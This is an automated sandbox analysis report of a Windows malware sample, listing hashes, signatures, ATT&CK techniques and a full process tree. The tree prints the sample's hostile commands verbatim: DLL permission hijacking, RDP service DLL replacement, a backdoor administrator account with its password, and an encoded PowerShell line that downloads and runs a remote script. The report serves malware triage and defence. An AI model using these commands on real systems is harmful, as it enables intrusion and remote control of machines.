Analysis

  • max time kernel
    131s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    06-11-2020 11:45

General

  • Target

    5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe

  • Size

    3.4MB

  • MD5

    cb15ff552cc7a8f69df60d2d68c8c54d

  • SHA1

    e9780d261ca4b8fbe3a2ca0cfaa587c6c642a8c8

  • SHA256

    5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a

  • SHA512

    d9689e28c8558390f76119fb6a1449b48e0bcae5fae49a495c8cd3f9accc0eedd9d8a9d853977faee45ac82fcfbaa76e183876ca11841fa659bbe4dd625bacba

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blacklisted process makes network request 10 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Modifies service 2 TTPs 2 IoCs
  • Drops file in Windows directory 41 IoCs
  • Modifies data under HKEY_USERS 60 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of WriteProcessMemory 127 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe
    "C:\Users\Admin\AppData\Local\Temp\5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1080
    • \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
      -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      2⤵
      • Deletes itself
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1536
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0bh5rtax\0bh5rtax.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:460
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES891D.tmp" "c:\Users\Admin\AppData\Local\Temp\0bh5rtax\CSCE8246D4B47E546308DB39550447045.TMP"
          4⤵
            PID:860
        • C:\Windows\system32\takeown.exe
          "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1816
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:380
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:1932
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:240
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1696
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:364
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1300
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1620
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:1080
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies service
            • Modifies registry key
            PID:1664
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:1612
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1324
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:860
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1160
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1440
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1464
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:560
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                    PID:1092
                    • C:\Windows\system32\cmd.exe
                      cmd /c net start TermService
                      4⤵
                        PID:1636
                        • C:\Windows\system32\net.exe
                          net start TermService
                          5⤵
                            PID:1776
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 start TermService
                              6⤵
                                PID:1972
                        • C:\Windows\system32\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                          3⤵
                            PID:1696
                          • C:\Windows\system32\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                            3⤵
                              PID:1932
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe user updwin Ghasar4f5 /del
                          1⤵
                            PID:616
                            • C:\Windows\system32\net.exe
                              net.exe user updwin Ghasar4f5 /del
                              2⤵
                                PID:1400
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user updwin Ghasar4f5 /del
                                  3⤵
                                    PID:1088
                              • C:\Windows\System32\cmd.exe
                                cmd /C net.exe user updwin BBy2z9SA /add
                                1⤵
                                  PID:740
                                  • C:\Windows\system32\net.exe
                                    net.exe user updwin BBy2z9SA /add
                                    2⤵
                                      PID:1596
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 user updwin BBy2z9SA /add
                                        3⤵
                                          PID:1572
                                    • C:\Windows\System32\cmd.exe
                                      cmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
                                      1⤵
                                        PID:364
                                        • C:\Windows\system32\net.exe
                                          net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
                                          2⤵
                                            PID:1504
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD
                                              3⤵
                                                PID:1580
                                          • C:\Windows\System32\cmd.exe
                                            cmd /C net.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
                                            1⤵
                                              PID:652
                                              • C:\Windows\system32\net.exe
                                                net.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
                                                2⤵
                                                  PID:576
                                                  • C:\Windows\system32\net1.exe
                                                    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
                                                    3⤵
                                                      PID:968
                                                • C:\Windows\System32\cmd.exe
                                                  cmd /C net.exe LOCALGROUP "Administrators" updwin /ADD
                                                  1⤵
                                                    PID:560
                                                    • C:\Windows\system32\net.exe
                                                      net.exe LOCALGROUP "Administrators" updwin /ADD
                                                      2⤵
                                                        PID:1160
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD
                                                          3⤵
                                                            PID:408
                                                      • C:\Windows\System32\cmd.exe
                                                        cmd /C net.exe user updwin BBy2z9SA
                                                        1⤵
                                                          PID:1292
                                                          • C:\Windows\system32\net.exe
                                                            net.exe user updwin BBy2z9SA
                                                            2⤵
                                                              PID:1828
                                                              • C:\Windows\system32\net1.exe
                                                                C:\Windows\system32\net1 user updwin BBy2z9SA
                                                                3⤵
                                                                  PID:1372
                                                            • C:\Windows\System32\cmd.exe
                                                              cmd.exe /C wmic path win32_VideoController get name
                                                              1⤵
                                                                PID:1700
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic path win32_VideoController get name
                                                                  2⤵
                                                                  • Modifies data under HKEY_USERS
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1592
                                                              • C:\Windows\System32\cmd.exe
                                                                cmd.exe /C wmic CPU get NAME
                                                                1⤵
                                                                  PID:1520
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic CPU get NAME
                                                                    2⤵
                                                                    • Modifies data under HKEY_USERS
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:860
                                                                • C:\Windows\System32\cmd.exe
                                                                  cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                  1⤵
                                                                    PID:1612
                                                                    • C:\Windows\system32\cmd.exe
                                                                      cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                      2⤵
                                                                        PID:980
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                          3⤵
                                                                          • Blacklisted process makes network request
                                                                          • Drops file in Windows directory
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:904

                                                                    Network

                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                    Persistence

                                                                    Account Manipulation

                                                                    1
                                                                    T1098

                                                                    Registry Run Keys / Startup Folder

                                                                    1
                                                                    T1060

                                                                    Modify Existing Service

                                                                    1
                                                                    T1031

                                                                    Defense Evasion

                                                                    Modify Registry

                                                                    3
                                                                    T1112

                                                                    File Permissions Modification

                                                                    1
                                                                    T1222

                                                                    Lateral Movement

                                                                    Remote Desktop Protocol

                                                                    1
                                                                    T1076

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\Users\Admin\AppData\Local\Temp\0bh5rtax\0bh5rtax.dll
                                                                      MD5

                                                                      ce0a1fe4aa267e50047db0925ee644fe

                                                                      SHA1

                                                                      d3ed91b968f4c71c50cb38871bff34891f4b27e7

                                                                      SHA256

                                                                      729038a27e63aa06fba68362767ec58e0cb38e6787a37b43738cb7ad7755946c

                                                                      SHA512

                                                                      b97db5f529f051ce9ae7e0602ca6b06c66c694da620ed052d028a5b933bbebcd5a9dd688bf68f1acbbeb8ec691fa281851b9977b2ceb4a1bbfbe99c0394c3206

                                                                    • C:\Users\Admin\AppData\Local\Temp\RES891D.tmp
                                                                      MD5

                                                                      6ae108d17a2f515d0616b5ffea2e254b

                                                                      SHA1

                                                                      66fe347e42e3b282d777392141987594e14fed07

                                                                      SHA256

                                                                      5453fab9b19813f00a0101651b7e912c5eefeae96260962191691ba10e067273

                                                                      SHA512

                                                                      0918d43c82fb66d296855938ffef6cb9ea29eb91cdb7ae5aebf2ca790e5824ffb4678409bb660589aced638d4cc8f763c20f3a030510472f4abc25166a02be3b

                                                                    • C:\Users\Admin\AppData\Local\Temp\get-points.ps1
                                                                      MD5

                                                                      dac6b25db50155c0c78d5bf64fb95fa3

                                                                      SHA1

                                                                      9e49c8f7a6df94acdefd0daa4c330f92f6d01d0d

                                                                      SHA256

                                                                      6967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf

                                                                      SHA512

                                                                      679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868

                                                                    • C:\Users\Admin\AppData\Local\Temp\get-points.zip
                                                                      MD5

                                                                      7cac19b2868c41555db4b71219217f9b

                                                                      SHA1

                                                                      d6f77db578db3c5c572c3a944d9072ed00560dcb

                                                                      SHA256

                                                                      d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a

                                                                      SHA512

                                                                      5bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6

                                                                    • C:\Windows\system32\rfxvmt.dll
                                                                      MD5

                                                                      dc39d23e4c0e681fad7a3e1342a2843c

                                                                      SHA1

                                                                      58fd7d50c2dca464a128f5e0435d6f0515e62073

                                                                      SHA256

                                                                      6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

                                                                      SHA512

                                                                      5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

                                                                    • \??\PIPE\samr
                                                                      MD5

                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                      SHA1

                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                      SHA256

                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                      SHA512

                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                    • \??\PIPE\samr
                                                                      MD5

                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                      SHA1

                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                      SHA256

                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                      SHA512

                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\0bh5rtax\0bh5rtax.0.cs
                                                                      MD5

                                                                      6f235215132cdebacd0f793fe970d0e3

                                                                      SHA1

                                                                      2841e44c387ed3b6f293611992f1508fe9b55b89

                                                                      SHA256

                                                                      ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec

                                                                      SHA512

                                                                      a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\0bh5rtax\0bh5rtax.cmdline
                                                                      MD5

                                                                      d0ac3b56ceefcfbac37a72d4518a1793

                                                                      SHA1

                                                                      ee5d5cb8d7ca4a76ee4da44080abc5e1e9bbaf33

                                                                      SHA256

                                                                      856d1db178fefd7f3a286cccdb941b51932b583a9cf839abcbc979cb5cfe967a

                                                                      SHA512

                                                                      58e22939ab91cd39731f336147bf028106b44559ce01160234f4d3ba177e4b9a13bb45346a946f5e364948e7bc3e3b4be71638be867d85818d98de1c6db14b7f

                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\0bh5rtax\CSCE8246D4B47E546308DB39550447045.TMP
                                                                      MD5

                                                                      456a958748927b2753e0e76b0f057a0e

                                                                      SHA1

                                                                      cc2f8052626b0ff8fe166eb44e3b91a6aab264a0

                                                                      SHA256

                                                                      a8268f03092a7278bab8330d4c56390a76198902c3fcb63507caa73d47b41b7e

                                                                      SHA512

                                                                      e1471488ae77cccebe8152d44f5db17bc720ed0ace6c5c095fe7303c3de935b36113a9a17327a0631995c7cb477b61e21a5162cbabc513ed305d2367936adfd4

                                                                    • \Windows\Branding\mediasrv.png
                                                                      MD5

                                                                      eeb448ea2709c57b9ea2e223d0c79396

                                                                      SHA1

                                                                      38331dd027386151ee37a29a7820570a76427b02

                                                                      SHA256

                                                                      c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272

                                                                      SHA512

                                                                      c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc

                                                                    • \Windows\Branding\mediasvc.png
                                                                      MD5

                                                                      bb873bd05a47f502ee4ed3c4ea749a4f

                                                                      SHA1

                                                                      e55a6bf49a4833fb9e9b123df39dac9bf507f75a

                                                                      SHA256

                                                                      a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a

                                                                      SHA512

                                                                      ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548

                                                                    • memory/240-40-0x0000000000000000-mapping.dmp
                                                                    • memory/364-42-0x0000000000000000-mapping.dmp
                                                                    • memory/380-38-0x0000000000000000-mapping.dmp
                                                                    • memory/408-71-0x0000000000000000-mapping.dmp
                                                                    • memory/460-10-0x0000000000000000-mapping.dmp
                                                                    • memory/560-53-0x0000000000000000-mapping.dmp
                                                                    • memory/576-67-0x0000000000000000-mapping.dmp
                                                                    • memory/860-13-0x0000000000000000-mapping.dmp
                                                                    • memory/860-49-0x0000000000000000-mapping.dmp
                                                                    • memory/860-75-0x0000000000000000-mapping.dmp
                                                                    • memory/904-77-0x0000000000000000-mapping.dmp
                                                                    • memory/904-95-0x0000000019FE0000-0x0000000019FE1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/904-97-0x000000001A000000-0x000000001A001000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/904-78-0x000007FEF5520000-0x000007FEF5F0C000-memory.dmp
                                                                      Filesize

                                                                      9.9MB

                                                                    • memory/904-88-0x0000000019270000-0x0000000019271000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/904-93-0x0000000019340000-0x0000000019341000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/904-113-0x000000001AE40000-0x000000001AE41000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/904-94-0x0000000019350000-0x0000000019351000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/904-105-0x000000001ADB0000-0x000000001ADB1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/904-104-0x0000000019FF0000-0x0000000019FF1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/904-96-0x0000000019360000-0x0000000019361000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/904-112-0x000000001A040000-0x000000001A041000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/968-68-0x0000000000000000-mapping.dmp
                                                                    • memory/980-76-0x0000000000000000-mapping.dmp
                                                                    • memory/1080-45-0x0000000000000000-mapping.dmp
                                                                    • memory/1080-1-0x00000000015D0000-0x00000000015E1000-memory.dmp
                                                                      Filesize

                                                                      68KB

                                                                    • memory/1080-0-0x0000000001290000-0x00000000015CD000-memory.dmp
                                                                      Filesize

                                                                      3.2MB

                                                                    • memory/1088-61-0x0000000000000000-mapping.dmp
                                                                    • memory/1092-54-0x0000000000000000-mapping.dmp
                                                                    • memory/1160-50-0x0000000000000000-mapping.dmp
                                                                    • memory/1160-70-0x0000000000000000-mapping.dmp
                                                                    • memory/1300-43-0x0000000000000000-mapping.dmp
                                                                    • memory/1324-48-0x0000000000000000-mapping.dmp
                                                                    • memory/1372-73-0x0000000000000000-mapping.dmp
                                                                    • memory/1400-60-0x0000000000000000-mapping.dmp
                                                                    • memory/1440-51-0x0000000000000000-mapping.dmp
                                                                    • memory/1464-52-0x0000000000000000-mapping.dmp
                                                                    • memory/1504-64-0x0000000000000000-mapping.dmp
                                                                    • memory/1536-21-0x00000000028F0000-0x00000000028F1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1536-7-0x00000000025D0000-0x00000000025D1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1536-35-0x000000001AAE0000-0x000000001AAE1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1536-2-0x0000000000000000-mapping.dmp
                                                                    • memory/1536-34-0x0000000002290000-0x0000000002291000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1536-17-0x0000000002420000-0x0000000002421000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1536-9-0x000000001C420000-0x000000001C421000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1536-3-0x000007FEF5520000-0x000007FEF5F0C000-memory.dmp
                                                                      Filesize

                                                                      9.9MB

                                                                    • memory/1536-18-0x00000000028C0000-0x00000000028C1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1536-4-0x00000000023D0000-0x00000000023D1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1536-5-0x000000001ADA0000-0x000000001ADA1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1536-33-0x0000000002280000-0x0000000002281000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1536-6-0x0000000002430000-0x0000000002431000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1572-63-0x0000000000000000-mapping.dmp
                                                                    • memory/1580-65-0x0000000000000000-mapping.dmp
                                                                    • memory/1592-74-0x0000000000000000-mapping.dmp
                                                                    • memory/1596-62-0x0000000000000000-mapping.dmp
                                                                    • memory/1612-47-0x0000000000000000-mapping.dmp
                                                                    • memory/1620-44-0x0000000000000000-mapping.dmp
                                                                    • memory/1636-55-0x0000000000000000-mapping.dmp
                                                                    • memory/1664-46-0x0000000000000000-mapping.dmp
                                                                    • memory/1696-83-0x0000000000000000-mapping.dmp
                                                                    • memory/1696-41-0x0000000000000000-mapping.dmp
                                                                    • memory/1776-56-0x0000000000000000-mapping.dmp
                                                                    • memory/1816-36-0x0000000000000000-mapping.dmp
                                                                    • memory/1828-72-0x0000000000000000-mapping.dmp
                                                                    • memory/1932-84-0x0000000000000000-mapping.dmp
                                                                    • memory/1932-39-0x0000000000000000-mapping.dmp
                                                                    • memory/1972-57-0x0000000000000000-mapping.dmp